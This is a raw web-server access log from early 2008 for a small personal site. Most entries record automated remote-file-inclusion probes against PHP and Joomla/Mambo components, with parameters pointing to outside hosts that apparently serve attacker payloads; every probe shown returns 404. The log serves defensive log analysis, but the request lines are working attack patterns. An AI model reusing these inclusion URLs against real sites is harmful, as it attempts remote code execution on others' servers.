65.214.45.100 - - [02/Jan/2008:19:42:53 -0800] "GET /minamijewelry/html/custom.html HTTP/1.0" 200 12705 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:19:46:38 -0800] "GET /logs/access_071220.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:19:46:38 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:19:46:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:19:47:22 -0800] "GET /logs/access_071214.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:19:48:32 -0800] "GET /logs/access_071220.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:19:48:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:19:48:33 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:19:49:26 -0800] "GET /logs/access_071214.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:19:49:44 -0800] "GET /logs/access_071220.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:19:49:44 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:19:49:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:19:50:08 -0800] "GET /config.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:19:50:08 -0800] "GET /logs/config.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:19:50:36 -0800] "GET /logs/access_071214.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.18 - - [02/Jan/2008:19:54:15 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.baptistwebdesign.com/mambots/content/bo.do?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
202.60.64.18 - - [02/Jan/2008:19:54:15 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.baptistwebdesign.com/mambots/content/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
67.15.175.50 - - [02/Jan/2008:19:55:06 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.205.238.186 - - [02/Jan/2008:19:55:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.19.167 - - [02/Jan/2008:19:58:33 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.223 - - [02/Jan/2008:19:59:02 -0800] "GET /logs/access_070930.log HTTP/1.0" 200 32172 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:20:01:24 -0800] "GET /contact.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:20:01:24 -0800] "GET /logs/contact.php?phpbb_root_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
70.87.13.242 - - [02/Jan/2008:20:04:25 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:20:06:29 -0800] "GET /logs/access_071214.log//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:20:06:30 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.25.233 - - [02/Jan/2008:20:06:48 -0800] "GET /logs/access_071220.log//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:07:38 -0800] "GET /logs/access_071214.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:07:38 -0800] "GET /logs/access_071214.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:07:38 -0800] "GET /logs/access_071214.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:07:39 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:07:39 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:07:39 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:07:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:07:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:07:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:08:58 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:08:58 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:08:58 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:10:56 -0800] "GET /logs/access_071220.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:10:56 -0800] "GET /logs/access_071220.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [02/Jan/2008:20:10:58 -0800] "GET /logs/access_071220.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/master/paddy_master.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.249.74 - - [02/Jan/2008:20:17:19 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.249.74 - - [02/Jan/2008:20:17:20 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.249.74 - - [02/Jan/2008:20:17:20 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.155.30 - - [02/Jan/2008:20:38:49 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.arooob.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [02/Jan/2008:20:38:49 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.arooob.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [02/Jan/2008:20:38:49 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.arooob.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.51.221.90 - - [02/Jan/2008:20:39:15 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.brockwhite.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
211.51.221.90 - - [02/Jan/2008:20:39:16 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.brockwhite.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
87.106.26.118 - - [02/Jan/2008:20:44:01 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [02/Jan/2008:20:44:01 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.35 - - [02/Jan/2008:20:45:08 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.73 - - [02/Jan/2008:20:45:09 -0800] "GET /plans/?N=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.26.118 - - [02/Jan/2008:20:47:05 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [02/Jan/2008:20:47:06 -0800] "GET /modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [02/Jan/2008:20:47:06 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [02/Jan/2008:20:47:06 -0800] "GET /logs/modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [02/Jan/2008:20:47:06 -0800] "GET /modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [02/Jan/2008:20:47:07 -0800] "GET /logs/modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [02/Jan/2008:20:48:01 -0800] "GET /logs/access_071214.log/modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [02/Jan/2008:20:48:33 -0800] "GET /logs/access_071214.log/modifyform.html?code=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.26.118 - - [02/Jan/2008:20:51:43 -0800] "GET /logs/access_071016.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.107.130 - - [02/Jan/2008:20:52:00 -0800] "GET //content.php?page=http://daystarrecords.bizland.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.201.194 - - [02/Jan/2008:20:55:05 -0800] "GET /logs/access_071219.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gulzarii.com/myfolder/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [02/Jan/2008:20:55:05 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gulzarii.com/myfolder/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [02/Jan/2008:20:55:05 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gulzarii.com/myfolder/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [02/Jan/2008:20:55:17 -0800] "GET /logs/access_071221.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gulzarii.com/myfolder/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [02/Jan/2008:21:03:11 -0800] "GET /logs/access_071224.log/PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.gulzarii.com/myfolder/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [02/Jan/2008:21:03:11 -0800] "GET /PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.gulzarii.com/myfolder/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [02/Jan/2008:21:03:11 -0800] "GET /logs/PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.gulzarii.com/myfolder/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [02/Jan/2008:21:04:33 -0800] "GET /logs/access_071212.log/PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.gulzarii.com/myfolder/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.241 - - [02/Jan/2008:21:08:25 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.241 - - [02/Jan/2008:21:08:25 -0800] "GET /funny/ HTTP/1.1" 200 812 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.6.19.219 - - [02/Jan/2008:21:10:38 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
71.162.253.32 - - [02/Jan/2008:21:10:54 -0800] "GET /logs/access_071222.log HTTP/1.1" 200 103077 "http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=Neos_Chronos+header.php&stq=20" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
204.85.9.104 - - [02/Jan/2008:21:36:30 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [02/Jan/2008:21:36:30 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [02/Jan/2008:21:36:30 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [02/Jan/2008:21:36:30 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [02/Jan/2008:21:36:30 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [02/Jan/2008:21:36:30 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.221 - - [02/Jan/2008:21:38:04 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.241 - - [02/Jan/2008:21:39:34 -0800] "GET /logs/access_070913.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.241 - - [02/Jan/2008:21:39:35 -0800] "GET /logs/access_071208.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.241 - - [02/Jan/2008:21:39:37 -0800] "GET /logs/access_071209.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.241 - - [02/Jan/2008:21:39:40 -0800] "GET /logs/access_071206.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.241 - - [02/Jan/2008:21:39:56 -0800] "GET /logs/access_071205.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.241 - - [02/Jan/2008:21:39:56 -0800] "GET /logs/access_071207.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
88.59.152.224 - - [02/Jan/2008:21:45:14 -0800] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.241 - - [02/Jan/2008:21:47:23 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.241 - - [02/Jan/2008:21:47:53 -0800] "GET /tmp/ HTTP/1.1" 200 1335 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.6.25.217 - - [02/Jan/2008:21:55:45 -0800] "GET /bikes/dteel/03MAR07/?D=A HTTP/1.0" 200 692 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:21:58:27 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:21:58:27 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:21:58:27 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:21:58:27 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:21:58:27 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:21:58:27 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:21:58:27 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:21:58:28 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:21:58:27 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.148.224 - - [02/Jan/2008:21:58:51 -0800] "GET /logs/access_071221.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.tiboron.de/phpBB2/cache/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.148.224 - - [02/Jan/2008:21:58:52 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.tiboron.de/phpBB2/cache/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.148.224 - - [02/Jan/2008:21:58:52 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.tiboron.de/phpBB2/cache/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.148.224 - - [02/Jan/2008:22:01:30 -0800] "GET /logs/access_071129.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.tiboron.de/phpBB2/cache/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:22:02:33 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.103.159.19 - - [02/Jan/2008:22:03:27 -0800] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.103.159.19 - - [02/Jan/2008:22:03:28 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.103.159.19 - - [02/Jan/2008:22:03:28 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.103.159.19 - - [02/Jan/2008:22:04:55 -0800] "GET /logs/access_071222.log//Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [02/Jan/2008:22:05:16 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [02/Jan/2008:22:05:16 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
